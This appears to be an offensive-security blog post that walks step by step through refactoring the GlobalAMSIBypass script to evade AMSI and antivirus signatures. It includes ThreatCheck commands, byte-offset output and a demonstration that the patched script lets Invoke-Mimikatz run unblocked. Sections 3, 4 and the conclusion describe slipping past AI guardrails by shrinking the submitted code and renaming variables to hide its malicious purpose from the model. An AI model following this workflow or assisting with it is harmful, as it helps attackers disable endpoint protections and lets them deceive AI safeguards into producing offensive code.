Background
Context
In offensive security, capabilities have a shelf life. A tool that delivered clean execution previously can be completely burned today by a single signature update, forcing you to pull it back into the lab for refactoring. Traditionally, fixing this involves a meticulous, manual process of isolating the flagged byte sequences, rewriting the logic, recompiling, and checking again.
While researching modern AMSI techniques, I decided to update a well-known utility, GlobalAMSIBypass,integrating generative AI into the refactoring pipeline to optimize and accelerate this feedback loop.
The end result is not novel, but rather than focusing on the bypass logic swaps, I want to share the highly repeatable AI-assisted workflow I used to identify malicious bytes, generate alternatives, merge the changes, and validate the code.
Here is the step-by-step blueprint of that workflow:
Setup
In this example, we will be using the well-known GlobalAMSIBypass project as our starting point.
- Action: Clone the source repository,
GlobalAMSIBypassby @chainski https://github.com/chainski/GlobalAMSIBypass
Command: git clone https://github.com/chainski/GlobalAMSIBypass
1. Establish a Baseline
First, we must establish a baseline of the controls and detections that will be tested during the workflow. For the PowerShell AMSI bypass example, we need to validate the following:
- Action: Confirm that real-time protection AMSI is enforced by attempting a known-bad trigger. Simply entering
Invoke-Mimikatz, should be blocked by AMSI if the controls are enabled.
Command: Invoke-Mimikatz
PS C:\Users\Administrator\Desktop\amsi-bypass > Invoke-Mimikatz
At line:1 char:1
+ Invoke-Mimikatz
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Administrator\Desktop\amsi-bypass >- Action: Confirm that PowerShell Constrained Language Mode (CLM) is NOT enabled. If CLM is enabled, execution may still be possible, but it will require evading WDAC/AppLocker controls.
Command: $ExecutionContext.SessionState.LanguageMode
PS C:\Users\Administrator\Desktop\amsi-bypass > $ExecutionContext.SessionState.LanguageMode
FullLanguage
PS C:\Users\Administrator\Desktop\amsi-bypass >2. Check for Bad Bytes
In this example, we will use ThreatCheck to test samples for malicious signatures. ThreatCheck uses a bisection method to evaluate samples, and when a malicious sample is found, it outputs the hex offset of the offending code.
C:\Users\Administrator\Desktop\amsi-bypass>git clone https://github.com/chainski/GlobalAMSIBypass
Cloning into 'GlobalAMSIBypass'...
remote: Enumerating objects: 95, done.
remote: Counting objects: 100% (95/95), done.
remote: Compressing objects: 100% (90/90), done.
remote: Total 95 (delta 46), reused 4 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (95/95), 284.51 KiB | 4.06 MiB/s, done.
Resolving deltas: 100% (46/46), done.
C:\Users\Administrator\Desktop\amsi-bypass>To optimize the parsing of a script versus a compiled binary, ThreatCheck has an AMSI engine flag (-e) and a type flag (-t) of Script that can be used.
- Action: Run
ThreatCheck.exeagainst theGlobalAMSIBypass.ps1project asset to locate the offset of the first malicious byte pattern.
Command: ThreatCheck.exe -f <filename> -e AMSI -t Script
C:\Users\Administrator\Desktop\amsi-bypass>c:\Tools\ThreatCheck\ThreatCheck.exe -f GlobalAMSIBypass\GlobalAMSIBypass.ps1 -e AMSI -t Script
status value: AmsiResultDetected
[+] Target file size: 6202 bytes
[+] Analyzing...
[*] Testing 3101 bytes
[*] No threat found, increasing size
[*] Testing 4651 bytes
[*] No threat found, increasing size
[*] Testing 5426 bytes
[*] No threat found, increasing size
[*] Testing 5814 bytes
[*] Threat found, splitting
[*] Testing 5620 bytes
[*] No threat found, increasing size
...
[*] Testing 5658 bytes
[*] Threat found, splitting
[*] Testing 5654 bytes
[*] Threat found, splitting
[*] Testing 5652 bytes
[*] Threat found, splitting
[!] Identified end of bad bytes at offset 0x1614
00001514 2D 00 48 00 6F 00 73 00 74 00 20 00 22 00 5B 00 -.H.o.s.t. .".[.
00001524 2A 00 5D 00 20 00 41 00 70 00 70 00 6C 00 79 00 *.]. .A.p.p.l.y.
00001534 69 00 6E 00 67 00 20 00 70 00 61 00 74 00 63 00 i.n.g. .p.a.t.c.
00001544 68 00 20 00 28 00 78 00 6F 00 72 00 20 00 65 00 h. .(.x.o.r. .e.
00001554 62 00 78 00 2C 00 20 00 65 00 62 00 78 00 29 00 b.x.,. .e.b.x.).
00001564 22 00 0D 00 0A 00 24 00 70 00 61 00 74 00 63 00 ".....$.p.a.t.c.
00001574 68 00 42 00 79 00 74 00 65 00 73 00 20 00 3D 00 h.B.y.t.e.s. .=.
00001584 20 00 28 00 5B 00 62 00 79 00 74 00 65 00 5B 00 .(.[.b.y.t.e.[.
00001594 5D 00 5D 00 28 00 37 00 32 00 2C 00 34 00 39 00 ].].(.7.2.,.4.9.
000015A4 2C 00 32 00 31 00 39 00 29 00 29 00 0D 00 0A 00 ,.2.1.9.).).....
000015B4 5B 00 53 00 79 00 73 00 74 00 65 00 6D 00 2E 00 [.S.y.s.t.e.m...
000015C4 52 00 75 00 6E 00 74 00 69 00 6D 00 65 00 2E 00 R.u.n.t.i.m.e...
000015D4 49 00 6E 00 74 00 65 00 72 00 6F 00 70 00 53 00 I.n.t.e.r.o.p.S.
000015E4 65 00 72 00 76 00 69 00 63 00 65 00 73 00 2E 00 e.r.v.i.c.e.s...
000015F4 4D 00 61 00 72 00 73 00 68 00 61 00 6C 00 5D 00 M.a.r.s.h.a.l.].
00001604 3A 00 3A 00 43 00 6F 00 70 00 79 00 28 00 24 00 :.:.C.o.p.y.(.$.
[*] Run time: 28.08s
C:\Users\Administrator\Desktop\amsi-bypass>The output shows the end of the bad bytes, but does not indicate exactly what tripped the engine. Some analysis can be done to infer which pattern the engine might be matching.
In this case, the System.Runtime.InteropServices.Marshal namespace combined with Copy is a massive red flag. The scan engine was able to calculate a malicious score without even considering the parameters passed to the Copy method and cut off right at the open parenthesis (.
Decision Tree:
- If Flagged: Continue on to step 3 'Code Isolation.'
- If Clean: Congratulations! The sample is clean, but that doesn't mean it works. Move straight to Functional Validation.
3. Code Isolation
If the scanner flags an offset, locate the corresponding lines in the source file for review. Extract and isolate the offending code before submitting the refactoring request to AI.
Limiting the offending code reduces the context of our refactor request, which can help bypass guardrails meant to prevent the creation of offensive code.
In addition to isolating code, replacing suspicious variable names before submitting code blocks is a best practice for removing IoCs and obscuring our end goal from AI.
In some cases, the flagged code itself may be inherently malicious due to its action or content, and options to obfuscate the purpose will be limited.
- Action: Isolate only the flagged portion of the code.
- Note: In some cases, it may be necessary to include additional code to provide a more complete context, but keeping the sample as small as possible limits the ability to identify any malicious intent.
4. AI-Driven Logic Refactoring
Instead of manually brainstorming alternative syntax, encoding techniques, or API obfuscation methods, leverage AI as an optimization engine.
- Action: Feed the isolated, flagged snippet into an AI model. Ask it to provide alternative programmatic approaches to achieve the exact same operational outcome while completely shifting the syntax, structure, or implementation details.
- Note: In many cases, it may be beneficial or necessary to specify the target language to ensure that the result aligns with your operational goals.
5. Iterative Verification Loop
With a new variation, the workflow enters a tight verification loop:
- Step A: Merge the AI-suggested modifications back into the local codebase.
- Step B: Run the updated codebase through the static analysis scanner again.
Decision Tree:
- If Flagged: Repeat the process starting at step 2.
- If Clean: Move to Functional Validation.
6. Functional Validation
A clean scan bypasses static analysis, but it doesn't mean the script works. The final step is to ensure operational integrity by testing the controls that were established in step 1.
- Action: Confirm that real-time protection AMSI is enforced by attempting a known-bad trigger. Simply entering
Invoke-Mimikatz, should be blocked by AMSI if the controls are enabled.
Command: Invoke-Mimikatz
PS C:\Users\Administrator\Desktop\amsi-bypass > Invoke-Mimikatz
At line:1 char:1
+ Invoke-Mimikatz
+ ~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS C:\Users\Administrator\Desktop\amsi-bypass >- Next, execute the newly refactored bypass script.
Command: .\GlobalAMSIBypass.ps1
PS C:\Users\Administrator\Desktop\amsi-bypass\GlobalAMSIBypass > .\GlobalAMSIBypass.ps1
[*] Initializing global AMSI bypass via AmsiScanBuffer patch...
[*] Locating AmsiScanBuffer in amsi.dll
[*] Looking up AmsiScanBuffer in amsi.dll
[+] Found AmsiScanBuffer at 0x00007FFC82768160
[+] Targeting patch address: 0x00007FFC82768181
[*] Creating delegate for VirtualProtect function
[*] Looking up VirtualProtect in kernel32.dll
[+] Found VirtualProtect at 0x00007FFC929282B0
[*] Creating delegate type for function pointer
[*] Changing memory protection to PAGE_EXECUTE_READWRITE
[*] Applying patch (xor ebx, ebx)
True
[*] Restoring memory protection to PAGE_EXECUTE_READ
[!] Global AMSI bypass completed successfully!
PS C:\Users\Administrator\Desktop\amsi-bypass\GlobalAMSIBypass >- Finally, re-run the trigger. If the block no longer occurs, the changes are validated.
Command: Invoke-Mimikatz
PS C:\Users\Administrator\Desktop\amsi-bypass\GlobalAMSIBypass > Invoke-Mimikatz
Invoke-Mimikatz : The term 'Invoke-Mimikatz' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the
path is correct and try again.
At line:1 char:1
+ Invoke-Mimikatz
+ ~~~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-Mimikatz:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
vb
PS C:\Users\Administrator\Desktop\amsi-bypass\GlobalAMSIBypass >
Conclusion
By treating the LLM as a modular code-generation assistant focused purely on syntax variation, the time spent refactoring stale code drops significantly.
By limiting or adjusting the source input, we can reduce our exposure and avoid hitting guardrails.
As a result, AI transforms a tedious task into a structured, programmatic loop of Identify ➡️ Isolate ➡️ Refactor via AI ➡️ Verify.
I've uploaded the refactored repository demonstrating the results of this workflow here:
References
GlobalAMSIBypass https://github.com/chainski/GlobalAMSIBypass
ThreatCheck https://github.com/rasta-mouse/ThreatCheck
Gen-AI Fork https://github.com/toneillcodes/GlobalAMSIBypass